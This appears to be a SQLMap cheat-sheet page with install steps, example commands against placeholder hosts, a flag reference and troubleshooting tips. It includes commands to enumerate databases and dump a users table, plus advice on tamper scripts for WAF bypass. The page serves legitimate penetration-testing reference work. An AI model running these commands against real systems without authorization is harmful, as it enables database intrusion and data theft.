SQLMap
Automatic SQL injection detection and exploitation tool
Web Vulnerabilities11 commands
#sqli#database#exploitation#injection
Installation
1Clone from GitHub or use package manager
2Ensure Python 3 is installed
3Verify installation
# Using Git
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python3 sqlmap.py --version
# Kali Linux
apt install sqlmap
# macOS
brew install sqlmapBasic Usage
Test and exploit SQL injection vulnerabilities
# Basic test
sqlmap -u "https://example.com/page?id=1"
# With POST data
sqlmap -u "https://example.com/login" --data="user=admin&pass=test"
# Database enumeration
sqlmap -u "https://example.com/page?id=1" --dbs
# Dump table
sqlmap -u "https://example.com/page?id=1" -D dbname -T users --dump
# With cookie
sqlmap -u "https://example.com/page?id=1" --cookie="session=abc123"Command Reference
11 commands
1Target URL with parameter
-u2POST data string
--data3Enumerate databases
--dbs4Specify database
-D5Specify table
-T6Dump table contents
--dump7HTTP cookie header
--cookie8Test level (1-5)
--level9Risk level (1-3)
--risk10Non-interactive mode
--batch11Use tamper scripts
--tamperWhen to Use
1
Testing for SQL injection2
Exploiting confirmed SQLi3
Database enumeration4
Data extraction5
Privilege escalation via SQLiNotes & Tips
1
Always get authorization before testing2
Start with low level/risk and increase3
Use --tamper for WAF bypass4
Check all injectable parametersCommon Errors & Solutions
Parameter not injectable
Try --level=5 --risk=3 or test manually first
WAF blocking requests
Use --tamper scripts like space2comment, randomcase
Connection timeouts
Increase --timeout or use --delay between requests